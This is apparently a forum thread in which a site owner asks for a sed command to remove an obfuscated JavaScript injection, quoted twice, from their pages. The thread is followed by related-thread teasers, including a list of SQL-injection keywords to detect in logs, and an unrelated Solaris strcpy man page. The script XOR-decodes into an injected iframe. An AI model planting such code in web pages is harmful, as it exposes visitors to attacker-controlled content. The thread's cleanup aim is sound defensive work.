03-05-2007
What about removing only .....
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>
at the first instance and the "<div id="testws35fdgh"></div>" part with a replace command at the second instance.
How should I start/end the sed command for
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>
Thanks
5 More Discussions You Might Find Interesting
1. Cybersecurity
My website has some weird malware installed in it. When I click on a link from a search engine (google, bing, or even yahoo) my pages get a string of javascript inserted into them. The page can be a simple "Hello World" and it will still inject a line of javascript into the page. Here is a screen... (1 Reply)
Discussion started by: noPermissions
1 Replies
2. OS X (Apple)
Im needing to create a postinst script for a debian package. I need it to search for this line of script in a plist file located at /folder/folder/folder/folder/folder/file.plist
<key>TESTKEYLINE</key>
<true/>
and after it create a new line and insert this code
<key>KEYNAME</key>... (0 Replies)
Discussion started by: iModdr
0 Replies
3. Shell Programming and Scripting
I want to grep/awk /var/log/httpd/mysite-access_log.log and check if 2 words from the following appear in a single line:
benchmark
union
information_schema
drop
truncate
group_concat
into
file
case
hex
lpad
group
order
having
insert
union
select
from (12 Replies)
Discussion started by: koutroul
12 Replies
4. Red Hat
I am trying to cause a callback in the Linux nvme driver by using AER injection. I've modified the AER source code to directly inject errors through module loading rather than from userland program.
I've verified that I got the correct bus, dev, and fn and that the error injection went... (0 Replies)
Discussion started by: Decrypto
0 Replies
5. Shell Programming and Scripting
Heyas
I've been told my scipts would be insecure, and to fix that.
Figured i might rethink some parts of my coding style, meanwhile i tried to write an additional catcher.
After reading:
fail : Security Issues - didnt help too much, infact - it confused me even more.
n/a:... (8 Replies)
Discussion started by: sea
8 Replies
strcpy(9F) Kernel Functions for Drivers strcpy(9F)
NAME
strcpy, strlcat, strlcpy, strncat, strncpy, strspn - String operations.
SYNOPSIS
#include <sys/ddi.h>
char *strcpy(char *dst, const char *src);
size_t strlcat(char *dst, const char *src, size_t dstsize);
size_t strlcpy(char *dst, const char *src, size_t dstsize);
char *strncat(char *restrict s1, const char *restrict s2, size_t n);
char *strncpy(char *dst, const char *src, size_t n);
size_t strspn(const char *s1, const char *s2);
INTERFACE LEVEL
Solaris DDI specific (Solaris DDI).
PARAMETERS
dst, src Pointers to character strings.
s1, s2 Pointers to character strings.
n Count of characters to be copied.
DESCRIPTION
The arguments dst, src, s1 and s2 point to strings. The strcpy(), strlcpy(), strncpy(), strlcat() and strncat() functions all alter their
first argument. These functions do not check for overflow of the array pointed to by the first argument.
strcpy()
The strcpy() function copies characters in the string src to dst, terminating at the first null character in src, and returns dst to the
caller. No bounds checking is done.
strncpy()
The strncpy() function copies src to dst, null-padding or truncating at n bytes, and returns dst. No bounds checking is done.
strlcpy()
The strlcpy() function copies a maximum of dstsize-1 characters (where dstsize represents the size of the string buffer dst) from src to
dst, truncating src if necessary. The result is always null-terminated. The function returns strlen(src). Buffer overflow can be checked
as follows:
if (strlcpy(dst, src, dstsize) >= dstsize)
return (-1);
strncat()
The strncat() function appends a maximum of n characters. The initial character of s2 overrides the null character at the end of s1.
strlcat()
The strlcat() function appends a maximum of (dstsize- strlen(dst)-1) characters of src to dst (where dstsize represents the size of the
string buffer dst). If the string pointed to by dst contains a null-terminated string that fits into dstsize bytes when strlcat() is
called, the string pointed to by dst is a null-terminated string that fits in dstsize bytes (including the terminating null character) when
it completes, and the initial character of src overrides the null character at the end of dst. If the string pointed to by dst is longer
than dstsize bytes when strlcat() is called, the string pointed to by dst is not changed. The function returns min{dst-
size,strlen(dst)}+strlen(src). Buffer overflow can be checked as follows:
if (strlcat(dst, src, dstsize) >= dstsize)
return -1;
strspn()
The strspn() function returns the length of the initial segment of string s1 that consists entirely of characters from string s2.
RETURN VALUES
strcpy(), strncat() and strncpy() return dst.
For strlcat(), strlcpy() and strspn(), see the Description section.
CONTEXT
These functions can be called from user or interrupt context.
SEE ALSO
strlen(9F), strcmp(9F), bcopy(9F), ddi_copyin(9F)
Writing Device Drivers
SunOS 5.10 7 Sep 2004 strcpy(9F)